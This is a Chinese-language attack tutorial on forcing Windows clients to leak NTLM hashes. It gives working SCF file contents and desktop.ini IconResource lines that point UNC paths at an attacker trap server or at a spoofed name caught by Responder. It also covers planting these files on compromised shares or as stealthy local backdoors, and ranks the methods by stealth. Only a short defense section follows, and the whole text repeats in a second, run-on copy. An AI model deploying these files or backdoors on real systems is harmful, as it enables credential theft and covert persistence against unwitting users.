利用配置文件重定向获取NTLM v1/v2 Hash攻击技术详解

0x00 前言

本文详细总结了利用SCF文件和修改文件夹图标两种方法强制客户端访问伪造的文件服务器或广播请求，从而获取NTLM v1/v2 Hash的技术。相比直接监听445端口，这种方法可以获取已经认证过的用户的Hash。

0x01 技术简介

主要介绍两种攻击方法：

添加SCF文件强制用户访问伪造的文件服务器
修改文件夹图标强制用户访问伪造的文件服务器

0x02 SCF文件简介

SCF文件是"Windows资源管理器命令"文件，是一种可执行文件。关键特性：

包含IconFile属性，可填写UNC路径
资源管理器访问时会自动执行该文件
可用于重定向客户端访问

0x03 利用SCF文件强制访问伪造文件服务器

测试环境

已控"文件"服务器：192.168.20.3 (Win2008)
陷阱服务器：192.168.20.141 (Win7)
客户端：192.168.20.2 (Win2012)

攻击步骤

在文件服务器共享目录中创建test.scf文件，内容如下：

[Shell]
Command=2
IconFile=\\192.168.20.141\SYS\test.ico
[Taskbar]
Command=ToggleDesktop

陷阱服务器开启抓包工具(Wireshark)
客户端访问文件服务器共享目录
陷阱服务器捕获客户端的NTLM认证信息

0x04 利用SCF文件强制访问未知目标(SMB欺骗)

测试环境

欺骗机器：192.168.20.131 (Kali)
已控文件服务器：192.168.20.3
客户端：192.168.20.2

攻击步骤

修改SCF文件内容为不存在的目标：

[Shell]
Command=2
IconFile=\\asdasdasd\SYS\test.ico
[Taskbar]
Command=ToggleDesktop

Kali开启Responder等SMB欺骗工具
客户端访问文件服务器共享目录
Kali捕获广播的NTLM认证信息

0x05 SCF文件作为本机后门

测试环境

SMB欺骗测试：
- 欺骗机器：192.168.20.131 (Kali)
- 客户端：192.168.20.2
固定IP测试：
- 陷阱服务器：192.168.20.141
- 客户端：192.168.20.2

攻击步骤

0x06 SCF文件总结

可用于获取已认证用户的Hash
可作为本机后门
支持直接指定IP或SMB欺骗
任意目录中的SCF文件都有效

0x07 修改文件夹图标技术简介

关键点：

修改文件夹图标会生成desktop.ini文件
该文件包含IconResource属性，可指定UNC路径
必须使用explorer .\desktop.ini命令编辑
修改后图标会暂时变化，约2分钟后恢复默认

0x08 利用修改文件夹图标作为后门

测试环境

SMB欺骗测试：
- 欺骗机器：192.168.20.131 (Kali)
- 客户端：192.168.20.2
固定IP测试：
- 陷阱服务器：192.168.20.141
- 客户端：192.168.20.2

攻击步骤

创建多层目录(如C:\T\TT\TTT)
修改TTT文件夹的图标
使用explorer .\desktop.ini编辑文件
修改IconResource为攻击目标：
- SMB欺骗：IconResource=\\asdasdasd\test\SHELL32.dll,3
- 固定IP：IconResource=\\192.168.20.141\test\SHELL32.dll,3
访问该目录即可触发认证

注意事项：

不能直接添加新的IconResource，必须修改原有项
图标会暂时变化，约2分钟后恢复但不影响功能

0x09 利用修改文件夹图标获取已认证用户Hash

方法与后门类似，区别在于：

在已控文件服务器上设置
客户端访问共享目录时触发

0x10 修改文件夹图标技术总结

比SCF文件更隐蔽
同样支持本机后门和获取已认证用户Hash
图标变化会暂时引起注意但很快恢复

0x11 防御措施

检查特殊文件：
- 监控.scf文件
- 检查desktop.ini中的IconResource
网络配置：
- 无特殊需要可禁用139/445端口
- 使用Kerberos认证替代NTLM

0x12 技术对比总结

特性	SCF文件方法	修改文件夹图标方法
隐蔽性	较低	较高
触发条件	访问含SCF的目录	访问修改图标的目录
支持SMB欺骗	是	是
支持固定IP指定	是	是
可作为本机后门	是	是
获取已认证用户Hash	是	是
实施复杂度	简单	中等

两种方法各有优劣，攻击者可根据实际情况选择使用。

利用配置文件重定向获取NTLM v1/v2 Hash攻击技术详解 0x00 前言本文详细总结了利用SCF文件和修改文件夹图标两种方法强制客户端访问伪造的文件服务器或广播请求，从而获取NTLM v1/v2 Hash的技术。相比直接监听445端口，这种方法可以获取已经认证过的用户的Hash。 0x01 技术简介主要介绍两种攻击方法：添加SCF文件强制用户访问伪造的文件服务器修改文件夹图标强制用户访问伪造的文件服务器 0x02 SCF文件简介 SCF文件是"Windows资源管理器命令"文件，是一种可执行文件。关键特性：包含IconFile属性，可填写UNC路径资源管理器访问时会自动执行该文件可用于重定向客户端访问 0x03 利用SCF文件强制访问伪造文件服务器测试环境已控"文件"服务器：192.168.20.3 (Win2008) 陷阱服务器：192.168.20.141 (Win7) 客户端：192.168.20.2 (Win2012) 攻击步骤在文件服务器共享目录中创建test.scf文件，内容如下：陷阱服务器开启抓包工具(Wireshark) 客户端访问文件服务器共享目录陷阱服务器捕获客户端的NTLM认证信息 0x04 利用SCF文件强制访问未知目标(SMB欺骗) 测试环境欺骗机器：192.168.20.131 (Kali) 已控文件服务器：192.168.20.3 客户端：192.168.20.2 攻击步骤修改SCF文件内容为不存在的目标： Kali开启Responder等SMB欺骗工具客户端访问文件服务器共享目录 Kali捕获广播的NTLM认证信息 0x05 SCF文件作为本机后门测试环境 SMB欺骗测试：欺骗机器：192.168.20.131 (Kali) 客户端：192.168.20.2 固定IP测试：陷阱服务器：192.168.20.141 客户端：192.168.20.2 攻击步骤在客户端创建共享目录(如C:\T) 在目录中放置SCF文件(内容同上) 访问该目录即可触发NTLM认证非共享目录同样有效 0x06 SCF文件总结可用于获取已认证用户的Hash 可作为本机后门支持直接指定IP或SMB欺骗任意目录中的SCF文件都有效 0x07 修改文件夹图标技术简介关键点：修改文件夹图标会生成desktop.ini文件该文件包含IconResource属性，可指定UNC路径必须使用 explorer .\desktop.ini 命令编辑修改后图标会暂时变化，约2分钟后恢复默认 0x08 利用修改文件夹图标作为后门测试环境 SMB欺骗测试：欺骗机器：192.168.20.131 (Kali) 客户端：192.168.20.2 固定IP测试：陷阱服务器：192.168.20.141 客户端：192.168.20.2 攻击步骤创建多层目录(如C:\T\TT\TTT) 修改TTT文件夹的图标使用 explorer .\desktop.ini 编辑文件修改IconResource为攻击目标： SMB欺骗： IconResource=\\asdasdasd\test\SHELL32.dll,3 固定IP： IconResource=\\192.168.20.141\test\SHELL32.dll,3 访问该目录即可触发认证注意事项：不能直接添加新的IconResource，必须修改原有项图标会暂时变化，约2分钟后恢复但不影响功能 0x09 利用修改文件夹图标获取已认证用户Hash 方法与后门类似，区别在于：在已控文件服务器上设置客户端访问共享目录时触发 0x10 修改文件夹图标技术总结比SCF文件更隐蔽同样支持本机后门和获取已认证用户Hash 图标变化会暂时引起注意但很快恢复 0x11 防御措施检查特殊文件：监控.scf文件检查desktop.ini中的IconResource 网络配置：无特殊需要可禁用139/445端口使用Kerberos认证替代NTLM 0x12 技术对比总结 | 特性 | SCF文件方法 | 修改文件夹图标方法 | |---------------------|---------------------|-------------------| | 隐蔽性 | 较低 | 较高 | | 触发条件 | 访问含SCF的目录 | 访问修改图标的目录| | 支持SMB欺骗 | 是 | 是 | | 支持固定IP指定 | 是 | 是 | | 可作为本机后门 | 是 | 是 | | 获取已认证用户Hash | 是 | 是 | | 实施复杂度 | 简单 | 中等 | 两种方法各有优劣，攻击者可根据实际情况选择使用。